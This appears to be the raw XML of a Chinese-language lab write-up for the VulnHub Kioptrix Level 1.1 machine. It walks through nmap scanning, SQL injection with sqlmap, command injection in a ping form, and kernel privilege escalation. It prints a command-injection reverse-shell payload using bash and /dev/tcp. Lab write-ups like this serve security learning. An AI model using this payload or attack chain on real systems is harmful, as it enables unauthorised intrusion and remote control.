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648B" w14:textId="553C0426" w:rsidR="00EE162D" w:rsidRDefault="00176BC5" w:rsidP="00176BC5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7A781359" w14:textId="12665ACC" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="00176BC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B72C01">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/kioptrix-level-11-2,23/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BB5F509" w14:textId="613410A3" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看了下描述利用基础知识来得到root权限这个样子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E6BB97" w14:textId="256F388C" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4149CD79" wp14:editId="3CB8A388">
            <wp:extent cx="5274310" cy="1282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BF3" w14:textId="3E356825" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="21E92DA8" w14:textId="73BFF31B" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该靶机的难点在于安装如何让kali成功扫到I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。。。。。。</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时排除bug一定要下载u</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:t>pdate</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>千万不要下载o</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:t>riginal</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在做o</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:t>riginal</w:t>
      </w:r>
      <w:r w:rsidR="00B76F8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候会遇到一个很恶心的bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D9014" w14:textId="58AD1001" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="024BCDCF" w14:textId="47998663" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载完后解压可以得到一个文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C55569" w14:textId="1E4A09A0" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15B7E9EB" wp14:editId="5337C9EA">
            <wp:extent cx="5274310" cy="487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FD05" w14:textId="1BDA44CB" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="1F8DD971" w14:textId="719A3D22" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点进去以后可以看到一个.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件，但是先别双击点开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45283916" w14:textId="3527B96C" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B14E03E" wp14:editId="4BB68C0D">
            <wp:extent cx="5274310" cy="1917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0E3" w14:textId="769D9043" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="15B46110" w14:textId="0A243B6E" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按住右键用编辑器打开，这里我选择V</w:t>
      </w:r>
      <w:r>
        <w:t>isual Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开来到第45行这里要把B</w:t>
      </w:r>
      <w:r>
        <w:t>ridged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改成N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后双击打开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270A5735" w14:textId="2B089FF0" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65349EAC" wp14:editId="3CA2CC62">
            <wp:extent cx="5274310" cy="2139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C7" w14:textId="50CE1CD2" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="0E348FBD" w14:textId="34AF3E2B" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还没完，在网络连接</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那里首先</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是默认桥接模式的一定要调回N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式，然后点击开始运行，这个时候不知道这个虚拟机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>咋设置</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的又跳回桥接模式，所以手</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>速一定</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要快赶快调回N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE3DD02" w14:textId="41F0C7B8" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7E5097" wp14:editId="171B410B">
            <wp:extent cx="3029106" cy="2228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E5A" w14:textId="536C4D26" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="7CD89C9E" w14:textId="158AA4FA" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后花了30分钟终于把I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫出来了。。。。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E7BCE0" w14:textId="7E8848FB" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B59763D" wp14:editId="4028F693">
            <wp:extent cx="4064209" cy="1149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E62" w14:textId="0E020352" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5"/>
    <w:p w14:paraId="7E460952" w14:textId="4BF4C94C" w:rsidR="00176BC5" w:rsidRDefault="00176BC5" w:rsidP="00176BC5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08DB4E71" w14:textId="58C85AAF" w:rsidR="00176BC5" w:rsidRDefault="00436B9A" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得知I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后开始用nmap探测波端口,主要开了22，80，111，443，620，631和3306端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F649E9E" w14:textId="0B379913" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A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-v -p- 192.168.234.140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF81EC1" w14:textId="194BC15F" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A09344" wp14:editId="735F8C8D">
            <wp:extent cx="4743694" cy="334662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C2B" w14:textId="3FF57331" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00176BC5"/>
    <w:p w14:paraId="4650FE42" w14:textId="026B8662" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问一波I</w:t>
      </w:r>
      <w:r>
        <w:t>P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正常访问开</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F01F0" w14:textId="178B3E6B" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00176BC5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="428A4033" wp14:editId="7A1BCCC3">
            <wp:extent cx="5274310" cy="2271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3FCC" w14:textId="3245ADD0" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00176BC5"/>
    <w:p w14:paraId="3629DA95" w14:textId="3B481FDB" w:rsidR="00436B9A" w:rsidRDefault="00436B9A" w:rsidP="00436B9A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登录界面存在注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAF298" w14:textId="715E8C2A" w:rsidR="00436B9A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里由于是个登录框，破解的方法可以是S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入或者可以尝试波用字典进行爆破，这里我偷懒了，直接用b</w:t>
      </w:r>
      <w:r>
        <w:t>urp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的active</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫到存在S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE53E6" w14:textId="5334201E" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8EFB6E" wp14:editId="05F7B02A">
            <wp:extent cx="5274310" cy="1964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84B" w14:textId="494E5FEF" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A"/>
    <w:p w14:paraId="5EC33647" w14:textId="40301413" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后保存到文本里面用sqlmap可以成功跑出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7EE61C" w14:textId="7692FACC" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED8F04C" wp14:editId="02E71811">
            <wp:extent cx="5274310" cy="1352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DE8" w14:textId="12A9C12D" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A"/>
    <w:p w14:paraId="15649BA4" w14:textId="74D6958E" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后接下来</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以跑出两个数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67345F45" w14:textId="1D055A1F" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB34DCA" wp14:editId="7E68FED6">
            <wp:extent cx="2635385" cy="5207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0CD5" w14:textId="7082801C" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A"/>
    <w:p w14:paraId="5979A3C3" w14:textId="08CB3F92" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而奇怪的事情又发生了。。。。分别跑这</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个库你是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跑不出来的所以我直接 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后面直接 </w:t>
      </w:r>
      <w:r>
        <w:t>–dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跑数据，直接跑到两个账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABE5C4" w14:textId="25DE41DB" w:rsidR="00DB046A" w:rsidRDefault="00DB046A" w:rsidP="00436B9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8AC50C" wp14:editId="6E0F3820">
            <wp:extent cx="4000706" cy="16447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2987" w14:textId="0DF2F803" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00436B9A"/>
    <w:p w14:paraId="3D214802" w14:textId="33734F85" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B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利用命令执行漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69BE608E" w14:textId="7A4367D7" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入admin的账号密码以后会遇见一个输入框</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF27DD" w14:textId="06F3A1D0" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30876654" wp14:editId="16CE2EFF">
            <wp:extent cx="4756394" cy="177809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208" w14:textId="2630A641" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B"/>
    <w:p w14:paraId="3366D4AB" w14:textId="65AB2607" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在里面输入kali的I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会帮你ping一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DED6C5" w14:textId="2B6645CC" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B0FFE75" wp14:editId="40E1A43B">
            <wp:extent cx="3937202" cy="146692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F33" w14:textId="7C4C3306" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B"/>
    <w:p w14:paraId="13CB4764" w14:textId="7F7375BC" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过测试发现|可以绕过，存在命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFAE5E" w14:textId="0B78AC3B" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A624BC2" wp14:editId="41F6AA8B">
            <wp:extent cx="3486329" cy="11811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49067C" wp14:editId="322C46DB">
            <wp:extent cx="3581584" cy="1098606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B86" w14:textId="46F5D1D5" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B"/>
    <w:p w14:paraId="5F7FBCEE" w14:textId="75A65881" w:rsidR="00B76F8B" w:rsidRDefault="00B76F8B" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么提前开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>etcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话</w:t>
      </w:r>
      <w:r w:rsidR="00EA1399">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,成功反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F2B7B" w14:textId="50F71A9D" w:rsidR="00B76F8B" w:rsidRDefault="00EA1399" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1399">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1399">
        <w:t>192.168.19.128| bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA1399">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA1399">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA1399">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA1399">
        <w:t>/192.168.19.128/5555 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4D6C6" w14:textId="099E522A" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00B76F8B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12E4A486" wp14:editId="51754584">
            <wp:extent cx="4362674" cy="8826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E22" w14:textId="79DA66BF" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00B76F8B"/>
    <w:p w14:paraId="4AA4AC51" w14:textId="193AB5C9" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C9A89" w14:textId="53B1BCAE" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看特殊权限，结果需要密码卒，换另外一个查看了Linux版本为C</w:t>
      </w:r>
      <w:r>
        <w:t>entOS4.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A1F4C" w14:textId="64A03F0B" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8D1659" wp14:editId="647C0F34">
            <wp:extent cx="4794496" cy="984301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F0C" w14:textId="338A5063" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用M</w:t>
      </w:r>
      <w:r>
        <w:t>SF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜到</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个提权</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C8714" w14:textId="5C3AA308" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444D8E36" wp14:editId="1EAA53B0">
            <wp:extent cx="5274310" cy="9385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52B" w14:textId="773A72A4" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399"/>
    <w:p w14:paraId="184CE80E" w14:textId="0D878C40" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先复制到root目录下然后开启python共享模式传上去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C31BE" w14:textId="42C1E583" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61806DCA" wp14:editId="52C74C2B">
            <wp:extent cx="5274310" cy="762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330C5C" wp14:editId="5BDDD707">
            <wp:extent cx="3473629" cy="16764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AEE7" w14:textId="7EAB19AD" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399"/>
    <w:p w14:paraId="0504FEC2" w14:textId="61692462" w:rsidR="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA1399">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后编译一下运行就可以获得root权限了</w:t>
      </w:r>
    </w:p>
